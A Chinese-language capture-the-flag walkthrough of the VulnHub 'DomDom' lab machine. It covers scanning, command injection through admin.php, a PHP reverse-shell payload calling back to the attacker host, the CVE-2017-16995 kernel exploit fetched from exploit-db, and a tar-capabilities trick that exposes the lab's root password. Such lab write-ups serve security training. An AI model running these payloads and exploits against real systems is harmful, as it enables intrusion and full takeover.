DomDom

下载地址:DomDom: 1 ~ VulnHub

1 信息收集

1.1 端口扫描

$ nmap -p - -T4 192.168.50.3 -oA domdom

Nmap scan report for test (192.168.50.3)

Host is up (0.00077s latency).

Not shown: 65534 closed tcp ports (conn-refused)

PORT   STATE SERVICE

80/tcp open  http

1.2 后台目录扫描

$ gobuster dir -u http://192.168.50.3 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php

===============================================================

Gobuster v3.1.0

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url:                     http://192.168.50.3

[+] Method:                  GET

[+] Threads:                 10

[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

[+] Negative Status codes:   404

[+] User Agent:              gobuster/3.1.0

[+] Extensions:              php

[+] Timeout:                 10s

===============================================================

2022/04/01 20:09:53 Starting gobuster in directory enumeration mode

===============================================================

/index.php            (Status: 200) [Size: 694]

/admin.php            (Status: 200) [Size: 329]

/server-status        (Status: 403) [Size: 300]

===============================================================

2022/04/01 20:10:26 Finished

===============================================================

1.2.1 目录分析

  1. http://192.168.50.3/index.php没有发现什么东东:只知道会弹回用户名

  2. http://192.168.50.3/admin.php也没有发现什么东东,就是有个好像可以命令执行的地方,但并没有看到

  3. 有问题找度娘,发现可以将原来http://192.168.50.3/admin.php的GET请求改为POST请求。

  4. http://192.168.50.3/admin.php请求体为在http://192.168.50.3/index.php提交的内容时,响应内容中多了cmd

    1. 请求包

      POST /admin.php HTTP/1.1
      
Host: 192.168.50.3
      
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
      
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      
Accept-Encoding: gzip, deflate
      
Connection: close
      
Upgrade-Insecure-Requests: 1
      
DNT: 1
      
Sec-GPC: 1
      
Content-Type: application/x-www-form-urlencoded
      
Content-Length: 49

name=id&username=id&password=123456&access=access

    2. 响应包

      HTTP/1.1 200 OK
      
Date: Fri, 01 Apr 2022 11:48:21 GMT
      
Server: Apache/2.4.18 (Ubuntu)
      
Vary: Accept-Encoding
      
Content-Length: 320
      
Connection: close
      
Content-Type: text/html; charset=UTF-8

<html>
      
	<head>
      
		<title>
      
			DomDom
      
		</title>
      
	</head>
      
	<body>

			<form method="POST">
      
			<input type="text" name="cmd" id="cmd" size="200">
      
			<br>
      
			<br>
      
			<input type="submit" value="Execute">
      
		</form>
      
		<pre>
      
			</pre>
      
	</body>

	<script>
      
		document.getElementById("cmd").focus();
      
	</script>

		</body>
      
</html>

2 GetShell

2.1 尝试命令执行

  1. http://192.168.50.3/admin.php请求体中增加cmd参数:成功执行了命令

    1. 请求包

      POST /admin.php HTTP/1.1
      
Host: 192.168.50.3
      
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
      
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      
Accept-Encoding: gzip, deflate
      
Connection: close
      
Upgrade-Insecure-Requests: 1
      
DNT: 1
      
Sec-GPC: 1
      
Content-Type: application/x-www-form-urlencoded
      
Content-Length: 56

name=id&username=id&password=123456&access=access&cmd=id

    2. 响应包

      HTTP/1.1 200 OK
      
Date: Fri, 01 Apr 2022 11:58:19 GMT
      
Server: Apache/2.4.18 (Ubuntu)
      
Vary: Accept-Encoding
      
Content-Length: 383
      
Connection: close
      
Content-Type: text/html; charset=UTF-8

<html>
      
	<head>
      
		<title>
      
			DomDom
      
		</title>
      
	</head>
      
	<body>

			<form method="POST">
      
			<input type="text" name="cmd" id="cmd" size="200">
      
			<br>
      
			<br>
      
			<input type="submit" value="Execute">
      
		</form>
      
		<pre>
      
	uid=33(www-data) gid=33(www-data) groups=33(www-data),27(sudo)
      
		</pre>
      
	</body>

	<script>
      
		document.getElementById("cmd").focus();
      
	</script>

		</body>
      
</html>

2.2 nc反弹shell失败

POST /admin.php HTTP/1.1

Host: 192.168.50.3

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 74

Origin: http://192.168.50.3

Connection: close

Referer: http://192.168.50.3/admin.php

Upgrade-Insecure-Requests: 1

DNT: 1

Sec-GPC: 1

name=id&username=id&password=123456&access=access&cmd=nc+192.168.50.2+2333

2.3 PHP反弹Shell

POST /admin.php HTTP/1.1

Host: 192.168.50.3

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 146

Origin: http://192.168.50.3

Connection: close

Referer: http://192.168.50.3/admin.php

Upgrade-Insecure-Requests: 1

DNT: 1

Sec-GPC: 1

name=id&username=id&password=123456&access=access&cmd=php+-r+'$sock%3dfsockopen("192.168.50.2",2333)%3bexec("/bin/bash+-i+<%263+>%263+2>%263")%3b'

2.4 GetShell

$ nc -nvlp 2333

listening on [any] 2333 ...

connect to [192.168.50.2] from (UNKNOWN) [192.168.50.3] 59400

bash: cannot set terminal process group (1716): Inappropriate ioctl for device

bash: no job control in this shell

To run a command as administrator (user "root"), use "sudo <command>".

See "man sudo_root" for details.

www-data@ubuntu:/var/www/html$

2.5 切换python Shell

python3 -c "import pty;pty.spawn('/bin/bash')"

3 提权

3.1 收集当前系统信息

  1. 查看当前用户sudo权限:没有密码

    www-data@ubuntu:/var/www/html$ sudo -l
    
[sudo] password for www-data:

  2. 查看当前WEB应用程序目录下的文件

    www-data@ubuntu:/var/www/html$ ls
    
admin.php  index.php

  3. 查看/etc/passwd文件

    www-data@ubuntu:/var/www/html$ cat /etc/passwd
    
root:x:0:0:root:/root:/bin/bash
    
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    
bin:x:2:2:bin:/bin:/usr/sbin/nologin
    
sys:x:3:3:sys:/dev:/usr/sbin/nologin
    
sync:x:4:65534:sync:/bin:/bin/sync
    
games:x:5:60:games:/usr/games:/usr/sbin/nologin
    
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    
www-data:x:33:33:www-data:/var/www:/bin/bash
    
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
    
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
    
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
    
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
    
syslog:x:104:108::/home/syslog:/bin/false
    
_apt:x:105:65534::/nonexistent:/bin/false
    
messagebus:x:106:110::/var/run/dbus:/bin/false
    
uuidd:x:107:111::/run/uuidd:/bin/false
    
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
    
whoopsie:x:109:116::/nonexistent:/bin/false
    
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
    
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
    
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
    
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
    
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
    
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
    
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
    
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
    
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
    
saned:x:119:127::/var/lib/saned:/bin/false
    
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
    
domom:x:1000:1000:DomDom,,,:/home/domom:/bin/bash

  4. 查看是否存在提权漏洞:

    www-data@ubuntu:/var/www/html/linux-exploit-suggester-1.1$ ./linux-exploit-suggester.sh
    
[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
    
   Exposure: highly probable
    
   Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04{kernel:4.4.0-21-generic} ]
    
   Download URL: https://www.exploit-db.com/download/40839
    
   ext-url: https://www.exploit-db.com/download/40847.cpp
    
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2017-16995] eBPF_verifier

   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
    
   Exposure: highly probable
    
   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
    
   Download URL: https://www.exploit-db.com/download/45010
    
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2016-8655] chocobo_root

   Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
    
   Exposure: highly probable
    
   Tags: [ ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic} ]
    
   Download URL: https://www.exploit-db.com/download/40871
    
   Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled

[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
    
   Exposure: highly probable
    
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
    
   Download URL: https://www.exploit-db.com/download/40611
    
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

  5. 利用CVE-2017-16995成功提权:

    # kali中编译提权脚本
    
wget https://www.exploit-db.com/download/45010
    
mv 45010 cve-2017-16995.c
    
gcc cve-2017-16995.c -o cve-2017-16995

# 将编译后的脚本cve-2017-16995上传到目标系统中
    
www-data@ubuntu:/var/www/html/linux-exploit-suggester-1.1$ scp kali@192.168.50.2:/home/kali/cve-2017-16995 .

3.3 提权

3.3.1 利用CVE-2017-16995提权

执行提权脚本成功提权

www-data@ubuntu:/var/www/html/linux-exploit-suggester-1.1$ ./cve-2017-16995

./cve-2017-16995

[.]

[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)

[.]

[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **

[.]

[*] creating bpf map

[*] sneaking evil bpf past the verifier

[*] creating socketpair()

[*] attaching bpf backdoor to socket

[*] skbuff => ffff880231b29600

[*] Leaking sock struct from ffff880232f63c00

[*] Sock->sk_rcvtimeo at offset 472

[*] Cred structure at ffff880231682540

[*] UID from cred structure: 33, matches the current: 33

[*] hammering cred structure at ffff880231682540

[*] credentials patched, launching shell...

# id

id

uid=0(root) gid=0(root) groups=0(root),27(sudo),33(www-data)

# python3 -c "import pty;pty.spawn('/bin/bash')"

root@ubuntu:/var/www/html/linux-exploit-suggester-1.1# cd ~

root@ubuntu:/root# ls

Ry{}LJRBS5nc+*V.#a

3.3.2 利用可执行文件的capabilities实现权限

  1. 查看当前系统的cap权限设置

    www-data@ubuntu:/tmp$ getcap -r / 2>/dev/null
    
/usr/bin/mtr = cap_net_raw+ep
    
/usr/bin/arping = cap_net_raw+ep
    
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
    
/usr/bin/traceroute6.iputils = cap_net_raw+ep
    
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
    
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
    
/bin/tar = cap_dac_read_search+ep

  2. 打包root家目录得到root的flag

    www-data@ubuntu:/tmp$ tar -cvf root.tar /root
    
tar: Removing leading `/' from member names
    
/root/
    
/root/.viminfo
    
/root/.nano/
    
/root/.bash_history
    
/root/.cache/
    
/root/.profile
    
/root/.bashrc
    
/root/Ry{}LJRBS5nc+*V.#a

  3. 打包domom家目录得到root密码

    www-data@ubuntu:/tmp$ tar -cvf domom.tar /home/domom/
    
www-data@ubuntu:/tmp/home/domom/Desktop$ cat README.md
    
Hi Dom, This is the root password:

Mj7AGmPR-m&Vf>Ry{}LJRBS5nc+*V.#a

  4. 成功登录到root

    www-data@ubuntu:/tmp/home/domom/Desktop$ su - root
    
su - root
    
Password: Mj7AGmPR-m&Vf>Ry{}LJRBS5nc+*V.#a

root@ubuntu:~# ls
    
Ry{}LJRBS5nc+*V.#a

DomDom的更多相关文章

  1. DomDom: 1 Vulnhub Walkthrough

    主机层面扫描: ╰─ nmap -p1-65535 -A -sV 10.10.202.140 You name 存在XSS 漏洞 右键源码有隐藏form表单 修改其type属性为:text 尝试了SQ ...

  2. JS高程3:DOM-DOM操作技术

    动态脚本 加载外部脚本 方式一,直接写代码: var script = document.createElement("script"); script.type = " ...

  3. React入门---属性(state)-7

    state------>虚拟dom------>dom 这个过程是自动的,不需要触发其他事件来调用它. state中文理解:页面状态的的一个值,可以存储很多东西. 学习state的使用: ...

  4. 10、QT分析之WebKit

    该文章整理自 网易博客 http://blog.163.com/net_worm/blog/static/12770241920101831312381/ 转载请注明出处 WebKit是QT4新整合的 ...

  5. QT分析之WebKit

    该文章整理自 网易博客 http://blog.163.com/net_worm/blog/static/12770241920101831312381/ 转载请注明出处 WebKit是QT4新整合的 ...

  6. webview综述

    nWebView 是webkit最核心的一个view,WebView管理WebFrameView和WebFrame之间的交互,一个WebView对象绑定一个window,并且要求MainFrame加载 ...

  7. vue问题整理

    生命周期面试题 1.什么是 vue 生命周期 vue 实例从创建到销毁的过程就是生命周期. 也就是从开始创建.初始化数据.编译模板.挂在 dom -> 渲染.更新 -> 渲染.卸载等一系列 ...

  8. jQuery学习笔记(1) 初识jQuery

    目录 目录 引用 注意 HelloWorldHelloWorld! jQueryjQuery对象和DOMDOM对象的相互转换 冲突的解决 引用 本地文件引用: <script src=" ...

随机推荐

  1. 火山引擎 DataLeap 的 Data Catalog 系统公有云实践

      Data Catalog 通过汇总技术和业务元数据,解决大数据生产者组织梳理数据.数据消费者找数和理解数的业务场景.本篇内容源自于火山引擎大数据研发治理套件 DataLeap 中的 Data Ca ...

  2. day41 6-1 安装配置maven & 6-2 创建maven项目 & 6-3 搭建springMVC框架 & 6-4 springMVC常用注解和封装工作单元

    day41 调度器 定义 web.xml配置 控制器Controller 配置自动扫描控制器 在spring-mv.xml中加入 <!-- 启用spring mvc 的注解 --> < ...

  3. Java中将 int[] 数组 转换为 List(ArrayList)

    前言 说起数组转换成 ArrayList,很多同学第一反应就是遍历数组,将元素逐个添加到 ArrayList 中,但是这个看着就lower,一般不会这么答. 所以马上就会想到Arrays工具类的 as ...

  4. linux 删除influxdb的某条数据

    1.进入服务器,输入: influx 进入influxdb 2.继续输入: show databases 显示所有的数据库名称 3.继续输入: use database 使用某一个数据库 ps:此处的 ...

  5. vue中mixins(混入)的用法

    vue中mixin的使用详解 混入 (mixin) 提供了一种非常灵活的方式,来分发 Vue 组件中的可复用功能.一个混入对象可以包含任意组件选项.当组件使用混入对象时,所有混入对象的选项将被&quo ...

  6. 工业数据分析为什么要用FusionInsight MRS IoTDB?

    摘要:MRS IoTDB,它是华为FusionInsight MRS大数据套件中的时序数据库产品,在深度参与Apache IoTDB社区开源版的基础上推出的高性能企业级时序数据库产品. 本文分享自华为 ...

  7. 搭建一个Hexo个人博客系统

    0x01 前言 虽然说前两天折腾了一下博客园(自己之前也有做过自己的博客,奈何维护费用太贵了,真的消耗不起,钱要花在刀刃上.) 网上有些教程有些参差不齐,今天给自己的真实搭建过程呈现给大家. 0x02 ...

  8. [OpenCV实战]12 使用深度学习和OpenCV进行手部关键点检测

    目录 1 背景 2 实现 3 结果和代码 4 参考 手部关键点检测是在手指上找到关节以及在给定图像中找到指尖的过程.它类似于在脸部(面部关键点检测)或身体(人体姿势估计)上找到关键点.但是手部检测不同 ...

  9. VSCode运行C/C++配置

    将MinGw安装目录下的 1.安装 VSCode 2.安装 MinGW 链接:点击跳转 3.MinGW 内安装两个模块 1.右键 Mark for Installation 勾选 (此处已安装好,所以 ...

  10. day03-Spring管理Bean-IOC-01

    Spring管理Bean-IOC 1.Spring配置/管理bean介绍 Bean管理包括两方面: 创建bean对象 给bean注入属性 Bean的配置方式: 基于xml文件配置方式 基于注解配置方式 ...